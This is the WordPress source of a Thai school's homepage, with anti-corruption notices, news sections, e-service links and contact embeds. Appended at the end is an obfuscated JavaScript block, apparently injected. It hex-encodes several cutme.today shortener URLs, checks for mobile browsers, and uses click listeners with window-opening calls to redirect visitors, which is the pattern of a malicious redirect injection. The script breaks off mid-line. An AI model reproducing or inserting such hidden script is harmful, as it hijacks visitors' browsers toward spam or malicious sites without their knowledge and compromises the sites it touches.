{\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 